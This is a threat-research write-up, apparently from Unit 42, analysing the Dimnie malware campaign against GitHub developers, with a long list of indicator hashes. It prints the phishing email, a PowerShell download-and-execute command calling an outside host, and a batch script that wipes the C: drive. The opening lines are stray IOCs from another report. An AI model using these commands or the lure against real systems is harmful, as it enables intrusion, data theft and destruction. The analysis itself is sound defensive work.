feab16570c11ec713cfa952457502c7edd21643129c846609cb13cdc0ae4671c
ed9ca7c06aac7525da5af3d1806b32eeb1c1d8f14cc31382ca52a14ed62f00a9
a3aa4b3b3471b0bb5b2f61cbc8a94edef4988436e0bc55e9503173c836fb57a3
29ee56ca66187ece41c1525ad27969a4b850a45815057a31acee7cc76e970909
65201380443210518621da9feb45756eac31213a21a81583cc158f8f65d50626
cccb906d06aef1e33d12b8b09c233e575482228d40ac17232acad2557da4e53b
C2 Domains
gtoimage[.]com
trend.gogolekr[.com
www.bestfiles[.]top
Sysget Version 4
2ac8bc678e5fa3e87d34aee06d2cd56ab8e0ed04cd236cc9d4c5e0fa6d303fa3
8dc539e3d37ccd522c594dc7378c32e5b9deeffb37e7a7a5e9a96b9a23df398e
C2 Domains
www.sanseitime[.]com
23/23
Dimnie: Hiding in Plain Sight
researchcenter.paloaltonetworks.com /2017/03/unit42-dimnie-hiding-plain-sight/
By Brandon Levene , Dominik Reichel and Esmid
Idrizovic
3/28/2017
A note to readers: The code samples included within this blog
post may trigger alerts from your security software. Please note that this
does not indicate an infection or an attack; rather, it is a notification that the code could be malicious if it were live.
Introduction
In mid-January of 2017 Unit 42 researchers became aware of reports of open-source developers receiving malicious
emails. Multiple owners of Github repositories received phishing emails like the one below:
Hello,
My name is Adam Buchbinder, I saw your GitHub repo and i'm pretty amazed.
The point is that i have an open position in my company and looks like you
are a good fit.
Please take a look into attachment to find details about company and job.
Dont hesitate to contact me directly via email highlighted in the document below.
Thanks and regards,
Adam.
Though there were multiple waves of messages following a similar tactic, each one carried the same malicious .doc file as
an attachment (SHA256: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e). This file contained
embedded macro code that executed a commonly observed PowerShell command to download and execute a file.
Figure 1. The attackers used a common technique to try to avoid static detection by introducing characters which the
Windows shell will ignore but static engines will typically see as part of the string.
A more readable version of the PowerShell code is shown below:
cmd.exe /c "powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object
system.net.webclient).downloadfile('hxxp://nicklovegrove.co[.]uk/wpcontent/margin2601_onechat_word.exe','%appdata%.exe');start-process '%appdata%.exe'"
On initial inspection, everything appears to follow the same formula as many
traditional
malware campaigns: e-mail lure,
malicious attachment, macro, PowerShell downloader, and finally a binary payload (SHA256:
3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22). Examining the payload
s communications
caused us to raise our eyebrows.
Dimnie, the commonly agreed upon name for the binary dropped by the PowerShell script above, has been around for
several years. Palo Alto Networks has observed samples dating back to early 2014 with identical command and control
mechanisms. The malware family serves as a downloader and has a modular design encompassing various information
stealing functionalities. Each module is injected into the memory of core Windows processes, further complicating analysis.
During its lifespan, it appears to have undergone few changes and its stealthy command and control methods combined
with a previously Russian focused target base has allowed it to fly under the radar up until this most recent campaign.
1/35
Hidden Requests
Let us dive right in and have a look at a typical HTTP request from Dimnie to its command and control infrastructure.
Figure 2. Initial HTTP GET request from the compromised client and the server
s reply. The HTTP payload is truncated in
this image.
Does this malware use a (now-defunct) Google service to aid its initial phone home? Not quite. Examining the HTTP
request, this appears to be an HTTP Proxy request, as described by RFC2616:
The absoluteURI form is REQUIRED when the request is being made to a proxy. The proxy is requested to
forward the request or service it from a valid cache, and return the response. Note that the proxy MAY
forward the request on to another proxy or directly to the serverspecified by the absoluteURI. In order to
avoid request loops, a proxy MUST be able to recognize all of its server names, including any aliases, local
variations, and the numeric IP address. An example Request-Line would be:GET
http://www.w3.org/pub/WWW/TheProject.html HTTP/1.1To allow for transition to absoluteURIs in all
requests in future versions of HTTP, all HTTP/1.1 servers MUST accept the absoluteURI form in requests,
even though HTTP/1.1 clients will only generate them in requests to proxies.
Dimnie uses this feature to create a supposedly legit HTTP proxy request to a Google service. However, the Google
PageRank service (toolbarqueries.google.com) has been slowly phased out since 2013 and as of 2016 is no longer open to
the public. Therefore, the absolute URI in the HTTP request is for a non-existent service and the server is not acting as a
proxy. This seemingly RFC compliant request is merely camouflage.
We know what it isn
t, so we will dive deeper to figure out what is happening underneath the camouflage layer. Start by
having a look at the DNS request that immediately preceded this HTTP GET request.
2/35
Figure 3. DNS request issued prior to the HTTP request above.
It looks pretty normal, but we can see an authoritative nameserver returning an IP address, 176.9.81[.]4, which is
highlighted in the image below.
Figure 4. Nameserver responds to a Type A query with a valid response.
While it may not seem so at first glance, this DNS query is related to the initial GET request to Google. Below is the raw hex
of the IP header of the HTTP request above:
Figure 5. Raw Hex of the IP Header from the HTTP GET request for Dimnie
s initial phone home.
The answer (176.9.81[.]4) from the initial DNS request for onechat[.]pw is used as the destination IP for the follow up HTTP
request that appears to connect to toolbarqueries.google.com. Sending the request to an entirely different server is not
complicated to achieve, but how many analysts would simply see a DNS request with no [apparent] related subsequent
traffic? That is precisely what Dimnie is relying upon to evade detections.
3/35
What the GET?
Since we have established the HTTP GET request to be largely falsified for camouflage purposes, we can now proceed to
pick apart the initial outbound HTTP traffic. The contents of the HTTP GET parameter are reproduced below:
GET http://toolbarqueries.google.com/search?sourceid=navclient-ff&features=Rank&client=navclient-autoff&ch=fYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm&q=info:google.com
HTTP/1.1
This GET request contains a single piece of data used by the malware: the contents of the
parameter which is base64
encoded.
fYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm
Decoding the
parameter yields us a AES key which Dimnie uses to decrypt payloads. The attacker uses AES 256 in
ECB mode to encrypt payloads which are push to a compromised host and decrypted.
The code below illustrates, in Python, the method we used to derive this key.
>>> import binascii
>>> import base64
>>> from Crypto.Cipher import AES
>>> a = "fYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm"
>>> b = base64.b64decode(a)
>>> decryptor = AES.new('\0' *32, AES.MODE_ECB)
>>> c = decryptor.decrypt(b)
>>> binascii.hexlify(c)
'cda59f1670cf48bf0000000011217350b14b3f2d4c6001006fb3b0fb00000000adf1de43000000000000000000000000'
>>> key = c[4:8] + ('\0' * 28)
>>> binascii.hexlify(key)
'70cf48bf00000000000000000000000000000000000000000000000000000000'
Besides the HTTP payload, which is an AES 256 ECB encrypted PE file (after decrypting, SHA256:
6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf), the server reply contains only one other
HTTP header that seems to be used by the malware; the Cookie value sent back from the C2 server. This Cookie is a 48
byte, base64 encoded, AES 256 ECB encrypted series of UINT32 values pertaining to the payload (when requested) or
outbound data (HTTP POSTs, see next section) as can be seen below (comments appended after //.)
struct DimnieInformation
UINT32
dwUnknown1; // 0x00:
UINT32
dwAesKey;
// 0x04: Final AES encryption key is: Key + (28 * '\0')
UINT32
dwUnknown3; // 0x08: Not used for encryption.
UINT32
dwUnknown4; // 0x0C:
UINT32
dwUnknown5; // 0x10: Can be subtracted with dwUnknown1 if higher than 0 but unknown use.
UINT32
dwUnknown6; // 0x14:
UINT32
dwKey2;
// 0x18: Not used for encryption.
UINT32
dwFileSize; // 0x1C: File size if file has been downloaded.
UINT32
dwUnknown9
// 0x20: Can be subtracted with dwUnknown1 if higher than 0 but unknown use.
UINT32
dwType;
// 0x24: Type of sent/received data.
UINT32
dwCRC;
// 0x28: CRC of the received data.
UINT32
dwModuleID; // 0x2C: Module ID of the downloaded module
Here is a list of possible types which may be found at offset 0x24:
Value
Description
4/35
0x00000000
Main PE module received.
0x00000001
16 byte information sent to C2, probably PING/PONG.
0x00000002
PE Module received.
0x000003a4
Get module.
0x000003a6
Get main module.
0x00002000
Running process.
0x00003000
PC Information (Computer name, language, network card,
0x00038000
Keylogger data
0x00058000
Screenshots in PNG.
0x00018000
Unknown.
0x00098000
Unknown.
0x00418000
Unknown.
0x00118000
Unknown.
0x00218000
Unknown.
0x00818000
Unknown.
0x02000000
Unknown.
The values contain a preset, defined size for the payload as well as an expected CRC32 value. Effectively, the Cookie
parameter is used to verify the payload
s integrity during the module downloader portion of the malware
s lifecycle. When
the Cookie value is included in later C2 traffic, it is primarily used to identify the type of data being sent back to the server
and the reporting module.
More Camouflage
Data exfiltration by the associated modules is performed using HTTP POST requests to another Google domain,
gmail[.]com. However, just like the module downloader portion of the malware, these HTTP requests are hardcoded to be
sent to an attacker controlled server. Again, Dimnie attempts to blend in by looking at least somewhat legitimate, although
the data exfiltration traffic is far less convincing than that of the module downloads.
5/35
Figure 6. HTTP POST request with encrypted data.
Once again, the data is appended to an image header and encrypted using AES 256 in ECB mode. The Cookie value
follows the same structure provided in the previous section. This initial push contains system information as can be seen in
the decrypted output below (data enclosed in brackets has been edited):
[netbios name]
WORKGROUP
HomeGroupUser$
[Hostname]
[Language]
10.0.2.15 (08-00-27-D9-83-51) 'Intel(R) PRO/1000 MT-Desktopadapter'
PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18
Administrator (0x10203)
[Username] (0x10223)
HomeGroupUser$ (0x10201)
[Hostname] (0x10221)
During our analysis, we identified follow on POST requests containing screenshots of the compromised desktop and
process activity lists which were encrypted and appended to a false JPEG header as described previously.
6/35
Figure 7. Process activity list, post-decryption.
Decoding the Traffic
Now that we understand how Dimnie retrieves its modules and how it protects them, we can use the derived AES key to
decode the observed payloads from our PCAP data. The payloads themselves are never written to disk as they are
downloaded and subsequently injected directly into memory. The module ID is stored at offset 0x2C as a 32 byte value in
the Cookie field, however to calculate the
true
module ID we must use the following formula using the key found at offset
0x04 in the cookie: uModuleID = uID
uKey. Below is a table of observed module IDs, their functions, and type of
information as referenced by the Cookie Header (at offset 0x24):
Module
Function
Information Value
0x20001
Main module: downloads other modules and injects them into memory.
0x20002
DLL module which exports SvcMain and is injected into another process.
0x20003
Contains 58 bytes in front of the DOS header. Purpose unknown. Appears to be N/A
a copy of the main module.
0x20004
Extracts PC information and sends it back to C2.
0x03000
0x20005
Enumerates running processes and sends the list back to the C2.
0x2000
0x20006
Module that can logkey strokes, take screenshots, interact with smartcards and
more. Uses RegisterRawInputDevices/GetRawInputData for logging keys.
0x38000, 0x418000,
0x818000, 0x98000,
0x118000, 0x218000,
0x58000
0x20007
Keylogger module which has two PE files appended. Both PE files contain the
same functionality but are different architecture (x86 and x64). It sends back
the logged keys and clipboard data to the C2
0x38000
0x20008
Module that can take screenshots and send them back to the C2.
0x58000
0x20009
Self-destruct module which deletes all files on the C:\ Drive.
0x02000000
The self-destruct module, 0x20009, drops and executes the following batch script:
7/35
@echo off
Title System need to reboot computer!
color 0c
Echo Auto Starting in 5 seconds
@ping 127.0.0.1 -n 5 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000 > nul
Color 0e
Echo delete disk C
del C:\\ /s /q
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000 > nul
color 0c
Echo Remove directory
Rd C:\\ /s /q
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000 > nul
Msg * \SYSTEM ERROR!HARDDRIVE IS OUT OF ORDER!\;
The primary purpose of the modules we
ve observed observed is information stealing and reconnaissance. It should be
noted that Dimnie
s modular framework allows for a variety of capabilities to be accessed by its operators, thus the modules
observed during the analyzed campaign may not encompass all available functionality.
Conclusion
The global reach of the January 2017 campaign which we analyzed in this post is a marked departure from previous
Dimnie targeting tactics. Multiple factors have contributed to Dimnie
s relatively long-lived existence. By masking upload
and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders
assumptions about
what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used by Russian
speakers, likely allowed Dimnie to remain relatively unknown.
Customers are protected by IPS, Dimnie is detected as malware by Wildfire, and Autofocus customers can see related
samples using the Dimnie tag.
We are also including IOCs for this malware family dating back to 2014 which include domains from DNS lookups
(Appendix A) and dropper hashes (Appendix B). IOCs specifically mentioned in this post are included in the next section.
IOCs Mentioned in this Report
ve purposefully omitted legitimate domains and IPs from this listing.
Initial Phishing Email: b70a17d21ec6552e884f01db47b4e0aa08776a6542883d144b9836d5c9912065
Malicious .doc file: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e,
Dimnie loader: 3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22,
Sample decrypted main module: 6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf
Appendix A: Associated SHA256 Hashes
15895f99011f466f2ddfa8345478b2387762d98eecf2ada51ad7f70618406ba1
7d8ec31d9d98802e9b1ebc49c4b300fa901934b3d2d602fa36cc5d7c5d24b3bc
046bc7347a66c977a89ba693307f881b0c3568314bb7ffd952c8705a2ff9bf9d
8/35
1b5e57fa264b2ce145b39f9fc2279b21f6b212aeca8eaa27f68cdcdbdef1900f
4b10cc374ed9e2c69231fcfa1b1d96496785ecf148f9445192f24385068e7b0c
e47ce23ec14114d3abeba090baa77b9bec876f947df67076dddb9087387735c7
d99c699e399afcd9e5abcff8c9b4a40af3e428f0c452c646653c79ec1a623bba
b6dc94f75ea4d2b46cf41079b1ac4cf48fe7786019396f379822fe6e21c9929d
a4df4a25e847d95a86a257bef7d2b349e9908bec37f0199f9f217d9cc0e28564
caba117fdf3ca61b1b17121adb4546e829df5426ab8944e5c4672f4a8619d0fe
3ffec5efb775c7d977f1e0ad1e8a51a111394e0ed113f58809fc8441b2c0f731
3d94881f0125093576dd01cd54cfd937cdca2b3050ad9aa4c5db2514d9aa686c
1d06464bafd24c228fd66df9cbf8feceda1346cef8648c2cd87cf617547bbe1e
9c403782571042fe2e3efb3acc35a26867956235a2a9472798bd664b65698c3a
d0eaec396ae11110dc4f51f3340d4735790876510de438f8a161577c7aa72d1e
222beafedbb604d200099cee657505f1d11b371403c7c9c12103adf28a561289
0f76bcda668095a8d2fe7a1282d463dcf04201e1c5a35856f117703bcd9428ef
c4bc691d7b8a16ff68ed338878451d1ba681aa181922cabd0b999b935ded673e
67a1dead18afc43c69a97de3e39bd84dec91df751a45bbda7ac5874f746c147c
7c4c2c898f611fd12a244822f5a2080da51126713d4ed1b3c950aa0ba6f92d93
67df79166bb258e77959c326c21563ea41f3f119d8e8486043efb83c868e636f
5661e7c23ed6058157b39ed29fa37690148d377b1faa7c7b89024daf0ef7e904
bbe7abc992928a45b618fbd7fbdd472ec3e4a47126f21ec38ad8257afe0c091f
05e30073cbd18b0ff2cfeab307e2e8cd2226d921a1872f17fcc312fc601fa93e
4a25bf18783ad32e08aaff0707d8fdae88647da4e0bfd22d83850e0dfa4ab148
3109724914f0eec8ee5167b15e43fc71e58106983ad0d2137c96239d5b25ad7c
c333173687879f3a6387f5afd915d9a4f042ffeb96f4cdf4514a5433de558f6f
071d91e67c42811d96d15a4a6dff740cc5d704ca352d9bc03778a2a6abd552f4
d884ae7b4f88973d2fb763b00c41171353310696e66dcde5733558ca68cd68d5
3944c7586e17399051785e1ae0311f4b98e74825291249a784428a64a80240e5
f76fe0b83e45a77ebc36ab12a27a5cf49be74fb154c51cb793e946c45bc4e12f
9f2367e31987327ef5710f7dcbfa089382c1967247c5ac1e2342e1e10e495fb5
5f45450f3342fd4f7f08651d58f775d47a25a44758039a577811eed6c094dfa7
824b93c4662cdc072488cf82d34569dd27d6f1fced5cb83f045825ed2e4b463c
9/35
441b1db0595565ac059552790e96524851843b22787238291f286b16c9c951d4
ba6022401ed257f82b7107319a7ec928044acd3dcb60dfab1ac7df2823ffef25
0a5c9818aa579082af224abc02dad60d77f4ded6533d143100b7744b58e289a2
871cefc4f9faf8658804dbe8332e3b511172ea29545e13c303ae1809edf8a0f6
bf3869e420ac8686b9ae3b14d679f45b34909ff998887f9fd0c8126853d6a4ed
8eef688751eed591bedd2fcc18d32bb84df11fdda62a16c963561aeeae56f6f4
c18775abf5c992cbd9b3b0c401fb0ee66bbe092e44b0b1b3cdd17fdc353d825e
ea6a8a46b61e2a8813c4146461e4c961dfb2cbcf277d8bb9edfc14be73f9f073
119972c1029267df7c5a8e607a2f034e7f8a3396ea49c67430842e0ff2de70eb
488c93d2e5413b974f489030c1f7484d2a6610cda0dd5a389b6a30371817d108
4ebb33fcf64afcd534ac83e72e49a4392b586bd31ef20b7bea2717cb9cde4928
a8779654e5abf142aaaca29b1abc0cbf1f5430e8a8fe7d955ae3ba6f1a9a3747
445e1aaa68169f30efa3d7d04f378c646abbbb3515430005b66d9e9ac182006c
417d6ec4701da0396bdffb8da0d582dabde35dedf9d468bcbe36f94df6dcf8e3
8a4748311e74cbf4f66a55ee4561728d0542929e9c260eda6d30bbde054fa53c
6a71582fb919a1300b98b035eb154602bf5452ff80d364a1f6603240cdbd8293
b01756a3f4b8d687a9fce4301f5f56b4dfb7befe29550096b262935f63f02cc4
b91fbf574bf080af82cd24977d00205dc0860ad7afb01f8f4a0ce0f910f9de6e
829797843357a5417f4de7b7f8f970ccfaccf30ecc80ed9c15e796897012d3e5
b10a1189aeb784c899bb5eb46b6cf1528b2ef6e3c0673159db4438e7aa39f6d7
2ba2491ce6a1814206dfe2aa9b1129f6085f1a18fd9b8c831caad286b095ee90
78961c49fa961bac01ebc8ef62077bc8fc8a3389f39fd7ee9d655447f0282fe2
aaa1511a156a11cff7e09367184972c067b65cae6573a8b4844dbe0a01894118
e64678633c8e876fc9313bfe5a8401953eaefdd8e7e006221cd5009f471fc389
2cedcdaa116feed52819914db3f19edf58c004a4a28c62f556d2ce3ced84b0f6
417addbd5817cc9dcf4f77f6240a56cd11a94c9a89e646d589e5ed26710cbcac
ff19d4f2c6527b2d4ecf65fa85115fddaec5420ef4346e1b6a21b28ccc5604b5
6e676f6be660799fbb4037c0c1ad39f9933b3e84cba0642fb7b892465b87325b
f9531a1ca3ee933812b709cc07a7d6ab6f8ee9900eee64ad97e936a68c5847e5
df56d66b8d9a16258a0b449084e3d82f8e338f0d0ff140bbcec1848357107dda
81ff2560c2f999d51f45b62110a5d37921a94d1af47f694780f9df8ed6c932ca
10/35
f9e6817f348cbfc4ca672ea275f3da390c31b45266e57b1f0f13f7c7ca37a3eb
eda0dfc38e7f32efe209902e653553a231de906b3a8894d31c3e39bd3a7e3a99
567cce05449594ed622160b443e81fb9e38989d830749d9e8bb5853f73226d11
62b8b1c425bce735789ab19b7e520304d85005df418221eb0f9b242d9e671a45
03766d99a1d7551ac4056c121c017ae70443d50c152ec1b06249c891baed435a
1d0a9d2e3c08f54b95575e4341f1d9699eb29ddbcf45757b1814ceabc9418a03
7dcda64fdfb2069f3b5f5047cfac6f2abfb6a2fb7591f974e5c0348ae86b6909
913589ca3fa86f9de6582204040753c779dd830e33876de338683587d7498766
590a4dedb34956e454d384e882440e731d50a83a819cfef000596d165a7d32c5
d0b44b803893fc08c08c653b2e0ca2ca2e2f52ef8cd49f0ac145337af5b2175f
cc74ef19129d061ba97801839ff04c00df07f684ff62df89061d7694c3a9c244
302b0b3731f86facb6be3fbe8eadf18d00d696175fc1590fc012b9c90fd60de6
bf4b6f9f28166c0c6916548694a09f98ab5e4e9c3012323b3a5fb3e6a6b33d9e
b857f5244e18fa9efc9b820dc70b827674f28bcea9ab7ef666e2271f0de4c9ef
0a46ce6d1d54fed2b200622ad0d5977e00e7865fe26c4cc69efa573e1ae542ad
10b8eaae1e00dfb40186a1d32f0c3cc10a47b9258afbbbdd81569b96b2c79a07
7b23f7c1ca90affc891ac89d6c9b592e0c47f1a539b9e8a87f6431fc0158404f
cc8585b57a9a371fb6d7250395bdcddca07150a7dd97c3a9dd67e408812feb8e
35074e717332d8fe3336448c8cf065bab56b978819b4685e618b094674be06df
a60c52336dc58251b28fba6345f75236bd7cf82c19702fa777fc926f04a5f75f
0bf94cbf7120ba5810c24772ba9752d22a31129cbed2009ebbed5bce18c916d5
052e93c7733e1a1fc5094682ab3cc3324b838d5260a1bed899ff93ef0966608c
3a9ec7a665475ca2f8e4eb314a3b845a727b3a99a818263284604b76b1857960
30d40c80ead9fd48b39aeee9c6f9d38951470d16bbe2bac09107d66f197cf012
e91c5056fc764bea87cc5a265a18c93140420ac15b030fa061f4e54e453d6c1e
5893e01e6ac20cfa75f184d1f6d708e3ccb3ff6da9f5183da415e3126e4d84b7
2d9b959ad8e19d2dd1d60e1bcbcfb014fcd9d671316b310d864fb2d881c16462
770c79684d74bdf8fb6d0d7cf138ddd06fdf7506e91eab09d79ded677f04ab98
98bbf1b17196a525e810689833dae910b144daf8ce85f31c73b9d0ca2dbdc426
0c760dc72a02073921d696840c31a372648a9f964be0afc0bd14554cb3a6be61
66f3b47798a56b74517094038862ce1a4555e5c975427db3b00835377cc26725
11/35
21e406638bffc35ad1929c5b03a0bbd42d1a39fb481d1954e0c15135e01e3c6e
01431670bfa2a14419323ba4731e2b9f03d9bc7362ae78b06792eb605249ff0f
517db060d4b0d8ae3a22d37f67311d9f5e2bf93d07424a4b9be5fefe84c571e6
3eb15bd22b9c70cfaa57a08eccb60de60e6bdaba00489ad0c61139504ec1b274
cc7b1846fa441c13cc03a8089013c55fd8c7bbabde049cf578df2633afebabff
eb47d187d81488b11690ac3191ad8e17774d8a11e559d692fcc344a905c34183
7f8c517b0873991b320d3f94e76f639afadf1481550c8931bae2b46afe204aa9
414475578f2d5642be77f2ea18df1f3ea97fc78a5b985944076c41f8b6e3fa54
a9fc88b00fe9ba84397aa7eba29a3dcc34da69a2eb89d9135cbfc04725605703
d390f1198f1b0c2307859b523a8fca918994c48cc630bff60f1b1fe159f974cb
fa56be12aec3eae896d372839d20bb02f45a8f167cfb44ca9b9e517f8bf454c5
8f0cf083af5412a8c228fe8d7755c2dd186248bf73de5db693019a0435de7dad
e593d990025104eeacc1bf48c3cf02a9f4503b056e6f17806dbc82e66f1878cc
6764806968caeec57f239584098f45eb4cdf1c1610d1a85b5c065bd4a3682fd9
63aa7d6759523c216de2bc85621f34d2a08f6c3c9dea8f4d3e0d1eae28afecdb
4a8336797a98e2f74062a477cf88a1c6be603102a3ead70d69823c5d3306536a
0595605bb8b6f4369e04be003c8de77d60d51c676bf463452758f0441c3dddac
611f0f92151aef878550ca0cbfb98433180607f374f5b68b72393a3d43f65381
7e275e43f70ac7962e5f4b503521af1862ac86ac8952aad52f7ff8452463b6d4
fd7f3195d0b9530131c5860e5db4755f9bf95c5cdc2b1c5563be5f49b0d35857
2fee7fbabcf1b4381ec3c8ef951bcdf9e204b9d8418815cc84efdd909a882413
f423bf186440e7ac1924a75bf3c532d61d62592d664e7bb004c10881fda3bade
3e21da2bfb27dc428214f94f6424b3d745e5590df45f333ad1f20552afbd410a
7ccdecd7997e78e766e2eddc1dd0d5b2a0ff8d601a7acaddf024c0fc2f4204dc
fc9b309039e083e390627f8203b6428a51ab570b3839a1e1efcc4b2855803fab
a1ca4464b092f361ae6c0bf60867c93fb507ca3f9c6de045979d708997539a7f
8e6d0b88a84ce804938ea9b5c41b0ed497ce00b070ce0b596913b4dc65501352
2aefd28e364b92ea42573d5f937ec53bd864e73cd8b7d40da27cbda2c6f9592a
86bd7d9187a273a9b0082ca84fcfec05d7f7ad5fe03360533004eadd64a86017
20b1853bec49af02aff6cd22b2c25e41a48df7a2cfbff785f6a110eff8742f6b
beb5a1afc328ab2f34f56a65ff4161d37be91adecfceaa83a2bc20b63fd35eed
12/35
3998a7feb58bc3f4741b9585ecdad04b1d16026ba116630c0d7b69f2651a9ec8
82fc70f991759e53daa66f2cc4f0873426049215b073973365341b000fa26585
2acff0e4efcf15d9b21f15869b955cfafa8f188d7e38de52c729c260d3cffc4c
9aa03d7f128678225dcdde8b8f8a792b7d56c768afde401a7ee779469a469271
03262308f43830db8fa4c3568aee387df5de96743c287bc6b49bea309b2dc373
95637e684a42583be98f3c1d2567cb5bdc3e7fcb875f054b58b1036f32834ada
f3ac0db23744528e8169c1bc58c844b0fdfa4129c5e8700b4bffb07daa75d1e4
e38804084d5cb0e7e80fd9144ed012dc92e89b68586dc2611ee90392d2fe46f7
6a1999cd18373653766b9385c3e60a3f21ffa040180172eb206142f601384d76
85176e6b449dc548af04c29fe13e8622c275c84691d449d6392607013f6fce07
d653637357b94b8547f5d81e78248c5f7dec8f64a3f7918563c1b5fa9086b3e8
97ee5dc97b2d21d299034cb02cc814a63494a31689afa3be9e47015b40b8b308
b1f47264a60d732ad917770406badcfaa3b845d85841c46b27ea758ee82f18c2
201480d3fe6598cb7557c4940e5db96e71de9a15364b19865ee61c11658e2b5b
ed9f3dba0c9a987094d1921e5316398aea169bf907ce848d6518ea40db15c46d
c2ba05bbebb35e99780c87e23a3d6f7b05ffcb17b21ee27f05fb62ec13e25b0e
abc4b46a96f432605336dbe376a92feeb77d768c473d52b725a853a3abeae92c
b2eae31ae2fecf69a5940e5e7d3ec90b241bd1223a4af25204676b67a176c88c
2d2c65e64f18e38991c609ca7d16cafb928c5c96132fe8f361dc3f31473b93f7
5750fcf5b4e31fcab9e81f154e1ec04105dd909f46ffdb9bcb986d7da9e6c22b
8ab4e92cd37cda1273f2359ec8d2c4b9cc4cf02faa199f8fe71f4f200a3ab31d
c693c3983f3c6e2e20d338ba240ff7411121a674b267ff86914156f9a91d5be4
cc05d4bffba7464194bf25ef5f8dfe9541048404b29e31fa93392663b1873501
375005db3906b1aad931c0207932ccdc99a191e9ceb100ae364ee1f2ca15682d
f9b85d337aeba34d23cbe1340f596cc908f572cbeeb5fed4fb389d779c7d5004
941007ae7918e8eb1845598053cf7fc4b0c17d708c2dbd1d1b13d2dc12b138e1
6069b42bfdf59ce5ec95f068e871ee266fa7593457eb4b38dda113014be87ce6
d3f4e3459bbe753ea8c022eef425d5b098b0f32c0e4cc4f390442d9796ed4ee2
9dd9befeefdc13ae72bf90952892eb357bdff72083c282fb73dd3821afe43e72
eb1f746dbdc2598757423e4505ff898b8308282e638f9b940d84870e7a196fba
32b7a4f26eb3e2f44eeb82b95f9971572aeb82f1e218bbad39b2a8238d1448bd
13/35
e3e708a03186f373d002e6e84c649bbd95668c2c17dee9c7fb0143f3d675837c
b909e6e7f909abbb57af26b244b330f822ed552a3c4dadd028079d8070108c10
813fdde0b998bda3247eadab873677972681274b4a9905030bf8d76727d57a6c
0353e9168983735e8efd2d53b4c498b7810f49e67169e33eb42ed2ef8d3a13eb
49b2fae0ae4d9cf71c2766a0d965d8a50bacd8c522eb45656b8b5f6a1c7c8f51
54e54c459dbe3224d3f4947b30f20b365224552afac4bd45ddadfacee9a7cbe2
6b8b394add913d3c410787f0c711217fec60a917872465de04290a8003b73535
3977472c733eafb7e71f8fd6fece5d2cfc849ec88e9d6942082531f3f88818b2
b2faf0d9f8f436968f3851ae863f3b3d9190b1be5856f2bd044e6b04447efa2f
53e4330ba988627e5f1f5544f23fae1c66c0f2d714a922b1130a1c9dc2efeda5
2c5871fb46e6fbf95266830ba7b4923449d0bc99a4efd7586ff5556ca049ea1c
20b2c347268546d317711aa693d078c0dcac247e486e3b87e45b099fabdff607
c8dee4c2212c7bf8eb9cd7635ff42526b17340fb198a801cdaa8d4ef72a3c1db
c3511e8d5de1ab2146ddb8ecc735890ef5cec0b31d175fca2fb2b88d60ec3e43
947e55e3454031972cc3d11006a60091b2197cc9e241e562ed900b82e4f28bd9
ba03da023f13796dd6dd70db0234da5df33ddc18ba274cdc62c282d56c695ece
de3aa81710f2580d3ac690c1f6d087a4672f29ccaa36e3901e4904056f83a48d
b3f371cc899440583095bac2817fba2ae2c7c3cac9c121d0798e03730589ad33
daefdf3c053971d35eb4a7447cf74c0335066d557ddbe56f01611e8b9a38b512
0dac129154c01867ca391da20227fdf7d7e3a9dd4cf42eac76833a051153794f
dd3ada0bb17356592e13bae5961c0bb131e645d2c957f1f2047cc25528f60518
f94b5803298a18b6ddc5eab202db6ae4e7199adf298ce16698e8053a36d5f934
6e7cb2c05000d0e609cebdb7d598fffc48eb5e7d1d589fc0947e322cdcffa070
dfc6ff1c54d3b7c2d6aa3ab9573debfe83b2d9a82c20b765a852c77d792ab10e
a0af21826f06da5292dfea3574648137292e31df1cd70a8262f03354dabfb38b
788222fe51e7bc91ce229f67557843db34e1ad68296069ed3235b022407fa610
858dc8648024588c644466e0386e101a925295f4b8ba3e3b7235aab7eee2788c
25eb81fc61b60b1a01eafc040b292b8c206a883555d1db3b80103f6a09b92f7d
a0ee38e7edac534827a1501bcc535ab7f604abfe654eb34b330ececc544cb084
c870b4dffa82f8b60efaf7b98875e4f823a207dfb2f0023ca1700392ca91c5c0
cb677ce864730abb68cb007f5ce3cf067fa982d5ec5e79402f4dd28506f763c7
14/35
29c653c91fa209754ffdc7d5d450df1eacea065eb327943d613a5341d4d091b7
0919a323113724b2e8734a3178996cedee88f827f7706423acf8407568a93bce
4aceb41286ad09a78a31006e65c374fd82f3f0682592cfa1b06a390b4450404a
8a1d7fe6146ad99ee806586f217e067cd34d5bff7dd44d516e08576c22b1a382
6905b72571b27eb36191c5394fdb8aa91a25561e2f65bb7f6283cd67b8b42695
cd0fcb23fe5387245008d5aba8e9f937bae13da0f5319e4c0952a0e5f8715fca
927d28f4be7b208111298aede19ea6a33d69769081747504a2a6fc0e65596582
0f7810dddc7f204c7da31f6d599ddf7b671dc635aa1c415dd3f5a65ffa0d72e9
665079b17747eb20e80e97a8d8b432fd3760cbe72edba4bac5f3dc95e2576d57
d24c97b62ed06288d3887dd9b720da4900e8703360fe48d62899e6ee156eda20
1d130eee41544ea7389f90a1cc19d2535ab5236985912c3cc000e5a9d2416e81
485c8b3339b13cd8cbb52c03b1024665f9307490a107c0bd8205cebf76cdcd3b
fffef40864cecb56422bb793055749084ab1d756a35075d60cd547b2a7b074cd
444dfc3bbb7406135002e3b6a75e48cd4ac40bb3213f9ba4836ad202e5fcea4a
d13c9c157d9ef56620698b20e2ffca8d9dcac3dd3109382098f423ca9588031f
